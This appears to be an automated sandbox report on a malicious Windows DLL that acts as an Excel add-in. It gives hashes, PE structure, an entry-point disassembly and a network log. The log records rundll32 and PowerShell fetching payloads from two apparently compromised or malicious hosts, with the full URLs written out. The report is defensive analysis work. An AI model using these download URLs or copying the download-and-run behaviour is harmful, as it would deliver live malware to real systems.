                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1510207563435464
                      Encrypted:false
                      SSDEEP:3:Nlllul9kLZ:NllUG
                      MD5:087D847469EB88D02E57100D76A2E8E4
                      SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                      SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                      SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                      Malicious:false
                      Preview:@...e.................................,..............@..........

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1db0znj.hx4.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgyfop5q.qvp.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5og1mcu.cil.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg2kzatk.gjz.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Windows\appcompat\Programs\Amcache.hve

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1835008
                      Entropy (8bit):4.422432477829449
                      Encrypted:false
                      SSDEEP:6144:aSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:JvloTMW+EZMM6DFy003w
                      MD5:3DBF2F9E03E424816D11B6710238C2C3
                      SHA1:4E6DAF71B8DA6255ADAC324628294406CA235CA3
                      SHA-256:140728541B56512D81C022EEA9C19E3E273125E79CF622E55E75C6869C68E495
                      SHA-512:D1F55D7C1996540D1ABD7BDC384492ED2A3014809BA66911A4511B3F0CB7000EB94CB8F4EBB7CDDCCAA4D8989B3426B23EE76DD03AB99F5FC57953E25F4AE347
                      Malicious:false
                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Entropy (8bit):4.284536343089267
                      TrID:
                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                      • Win64 Executable (generic) (12005/4) 10.17%
                      • Generic Win/DOS Executable (2004/3) 1.70%
                      • DOS Executable Generic (2002/1) 1.70%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                      File name:SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll
                      File size:12'288 bytes
                      MD5:7e730829ca817bbf6ad9e7d6b6aa0eb0
                      SHA1:0564905a3f32aba7b00d41ce4a60f7dce6b33b42
                      SHA256:a683ad754bdeea6485f3b7b45319c4b6b5e82aecb6fe6fc801716192d8b2d2c0
                      SHA512:27d26a7133614a00e39a63db1efad91ac3340576dc97c896e3151fea1d2502c9ee6f740b0b7cc4398e1f55036b1446312cc22c548e5fe9b91e7cd46b9829ddb8
                      SSDEEP:192:flcL29RBzDzeobchBj8JONiONolVFFhrucrEPEjr7AhAm:fly29jnbcvYJOfClhxucvr7CAm
                      TLSH:D042C60EBB6354BCC816D172C1EB5B79F2B275110A22C73D07A0C7371EB2A69572ED05
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...K.Mf..........."...$.....,......P..........{....................................n:....`... ............................

                      File Icon

                      Icon Hash:7ae282899bbab082

                      Static PE Info

                      General

                      Entrypoint:0x27b031350
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x27b030000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, DLL
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x664DF24B [Wed May 22 13:25:31 2024 UTC]
                      TLS Callbacks:0x7b031510, 0x2, 0x7b0314e0, 0x2
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:b96aec3ffae7ee03e83bfcd97f055c55

                      Entrypoint Preview

                      Instruction
                      dec eax
                      mov eax, dword ptr [00002FE9h]
                      mov dword ptr [eax], 00000000h
                      jmp 00007FDA91276DB3h
                      nop word ptr [eax+eax+00000000h]
                      nop dword ptr [eax]
                      dec eax
                      mov edx, ecx
                      dec eax
                      lea ecx, dword ptr [00005C86h]
                      jmp 00007FDA91277CE6h
                      nop
                      dec eax
                      lea ecx, dword ptr [00000009h]
                      jmp 00007FDA91276EF9h
                      nop dword ptr [eax+00h]
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      dec eax
                      sub esp, 38h
                      inc ebp
                      xor ecx, ecx
                      xor ecx, ecx
                      dec esp
                      lea eax, dword ptr [00002C50h]
                      dec eax
                      lea edx, dword ptr [00002C81h]
                      dec eax
                      mov dword ptr [esp+20h], 00000000h
                      call 00007FDA91276F50h
                      mov dword ptr [esp+28h], 00000000h
                      xor ecx, ecx
                      dec esp
                      lea ecx, dword ptr [00002CE6h]
                      dec eax
                      mov dword ptr [esp+20h], 00000000h
                      dec esp
                      lea eax, dword ptr [00002C1Ah]
                      dec eax
                      lea edx, dword ptr [00002CDBh]
                      call dword ptr [00007E11h]
                      xor eax, eax
                      dec eax
                      add esp, 38h
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      jmp dword ptr [00007E0Eh]
                      nop
                      nop
                      nop dword ptr [eax+eax+00000000h]
                      dec eax
                      sub esp, 28h
                      dec eax
                      mov eax, dword ptr [000000F5h]

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x80000x5a.edata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x414.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x1c8.pdata
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000x58.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x41200x28.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x91440xe0.idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x13280x140017ffd29a7a8f1ced400d723bcc60972fFalse0.580859375data5.916712142989011IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x30000x400x20087d6fd0eb84229ab5ed6baf54b29d300False0.056640625data0.322541603835012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x40000x3500x40080770f67722ee70794323babcd1ae382False0.373046875data3.322714260697826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .pdata0x50000x1c80x200feb44b7e1d9d7a1f5c38c8e31cf91009False0.5390625data3.428853958367466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .xdata0x60000x1300x2005ffb25ed738474db92f0d755615a5bf1False0.322265625data2.629423229714015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .bss0x70000xe00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .edata0x80000x5a0x200f379caed75ed7daaaf77b82ed547f8f1False0.166015625data0.9379439069517403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .idata0x90000x4140x600676ff18ee333ec1f2c163635315b5480False0.283203125data2.7697675983474315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .CRT0xa0000x580x200e011bf4104e792bba1f87bca7545cf55False0.056640625data0.25323120180391656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls0xb0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .reloc0xc0000x580x200aaef006c86288ce5a1f076c63d4dc69fFalse0.17578125data0.9130963814717786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Imports

                      DLLImport
                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                      msvcrt.dll__iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, realloc, strlen, strncmp, vfprintf
                      SHELL32.dllShellExecuteW
                      urlmon.dllURLDownloadToFileW

                      Exports

                      NameOrdinalAddress
                      hash10x27b033000
                      xlAutoOpen20x27b0313a0

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 22, 2024 22:08:39.268282890 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:39.268316031 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:39.268394947 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:39.300492048 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:39.300508022 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.017967939 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.018044949 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.072310925 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.072331905 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.072668076 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.072724104 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.074455976 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.118498087 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.308008909 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.308038950 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.308098078 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:40.308113098 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.308178902 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.466950893 CEST49707443192.168.2.5194.124.213.167
                      May 22, 2024 22:08:40.466979027 CEST44349707194.124.213.167192.168.2.5
                      May 22, 2024 22:08:43.217333078 CEST4971380192.168.2.591.222.173.38
                      May 22, 2024 22:08:43.266707897 CEST804971391.222.173.38192.168.2.5
                      May 22, 2024 22:08:43.266932011 CEST4971380192.168.2.591.222.173.38
                      May 22, 2024 22:08:43.336366892 CEST4971380192.168.2.591.222.173.38
                      May 22, 2024 22:08:43.341437101 CEST804971391.222.173.38192.168.2.5
                      May 22, 2024 22:08:44.369020939 CEST4971580192.168.2.591.222.173.38
                      May 22, 2024 22:08:44.376112938 CEST804971591.222.173.38192.168.2.5
                      May 22, 2024 22:08:44.376198053 CEST4971580192.168.2.591.222.173.38
                      May 22, 2024 22:08:44.376910925 CEST4971580192.168.2.591.222.173.38
                      May 22, 2024 22:08:44.446057081 CEST804971591.222.173.38192.168.2.5
                      May 22, 2024 22:09:04.644844055 CEST804971391.222.173.38192.168.2.5
                      May 22, 2024 22:09:04.644922018 CEST4971380192.168.2.591.222.173.38
                      May 22, 2024 22:09:04.730880022 CEST4971380192.168.2.591.222.173.38
                      May 22, 2024 22:09:04.735919952 CEST804971391.222.173.38192.168.2.5
                      May 22, 2024 22:09:04.741199017 CEST4973380192.168.2.591.222.173.38
                      May 22, 2024 22:09:04.746413946 CEST804973391.222.173.38192.168.2.5
                      May 22, 2024 22:09:04.746490002 CEST4973380192.168.2.591.222.173.38
                      May 22, 2024 22:09:04.746615887 CEST4973380192.168.2.591.222.173.38
                      May 22, 2024 22:09:04.799874067 CEST804973391.222.173.38192.168.2.5
                      May 22, 2024 22:09:05.800349951 CEST804971591.222.173.38192.168.2.5
                      May 22, 2024 22:09:05.800453901 CEST4971580192.168.2.591.222.173.38
                      May 22, 2024 22:09:05.803054094 CEST4971580192.168.2.591.222.173.38
                      May 22, 2024 22:09:05.804590940 CEST4973480192.168.2.591.222.173.38
                      May 22, 2024 22:09:05.815576077 CEST804971591.222.173.38192.168.2.5
                      May 22, 2024 22:09:05.867490053 CEST804973491.222.173.38192.168.2.5
                      May 22, 2024 22:09:05.867789984 CEST4973480192.168.2.591.222.173.38
                      May 22, 2024 22:09:05.868083954 CEST4973480192.168.2.591.222.173.38
                      May 22, 2024 22:09:05.925276041 CEST804973491.222.173.38192.168.2.5
                      May 22, 2024 22:09:26.161771059 CEST804973391.222.173.38192.168.2.5
                      May 22, 2024 22:09:26.165400982 CEST4973380192.168.2.591.222.173.38
                      May 22, 2024 22:09:26.252187014 CEST4973380192.168.2.591.222.173.38
                      May 22, 2024 22:09:26.257188082 CEST804973391.222.173.38192.168.2.5
                      May 22, 2024 22:09:27.344283104 CEST804973491.222.173.38192.168.2.5
                      May 22, 2024 22:09:27.344381094 CEST4973480192.168.2.591.222.173.38
                      May 22, 2024 22:09:27.937720060 CEST4973480192.168.2.591.222.173.38
                      May 22, 2024 22:09:28.227102995 CEST804973491.222.173.38192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 22, 2024 22:08:39.239166975 CEST6373553192.168.2.51.1.1.1
                      May 22, 2024 22:08:39.263199091 CEST53637351.1.1.1192.168.2.5
                      May 22, 2024 22:08:43.077368021 CEST5969253192.168.2.51.1.1.1
                      May 22, 2024 22:08:43.096689939 CEST53596921.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      May 22, 2024 22:08:39.239166975 CEST192.168.2.51.1.1.10x78acStandard query (0)www.siguefutbol.comA (IP address)IN (0x0001)false
                      May 22, 2024 22:08:43.077368021 CEST192.168.2.51.1.1.10x5985Standard query (0)iapartmentlistings.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      May 22, 2024 22:08:39.263199091 CEST1.1.1.1192.168.2.50x78acNo error (0)www.siguefutbol.comsiguefutbol.comCNAME (Canonical name)IN (0x0001)false
                      May 22, 2024 22:08:39.263199091 CEST1.1.1.1192.168.2.50x78acNo error (0)siguefutbol.com194.124.213.167A (IP address)IN (0x0001)false
                      May 22, 2024 22:08:43.096689939 CEST1.1.1.1192.168.2.50x5985No error (0)iapartmentlistings.com91.222.173.38A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.siguefutbol.com
                      • iapartmentlistings.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.54971391.222.173.38807460C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      May 22, 2024 22:08:43.336366892 CEST175OUTGET /tykhwuxk HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: iapartmentlistings.com
                      Connection: Keep-Alive


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.54971591.222.173.38807840C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      May 22, 2024 22:08:44.376910925 CEST175OUTGET /tykhwuxk HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: iapartmentlistings.com
                      Connection: Keep-Alive


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.54973391.222.173.38807460C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      May 22, 2024 22:09:04.746615887 CEST175OUTGET /tykhwuxk HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: iapartmentlistings.com
                      Connection: Keep-Alive


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.54973491.222.173.38807840C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      May 22, 2024 22:09:05.868083954 CEST175OUTGET /tykhwuxk HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: iapartmentlistings.com
                      Connection: Keep-Alive


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549707194.124.213.1674437244C:\Windows\System32\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-05-22 20:08:40 UTC336OUTGET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1
                      Accept: */*
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: www.siguefutbol.com
                      Connection: Keep-Alive
                      2024-05-22 20:08:40 UTC296INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Wed, 22 May 2024 20:08:40 GMT
                      Content-Type: text/plain
                      Content-Length: 2331
                      Last-Modified: Wed, 22 May 2024 12:55:26 GMT
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "664deb3e-91b"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
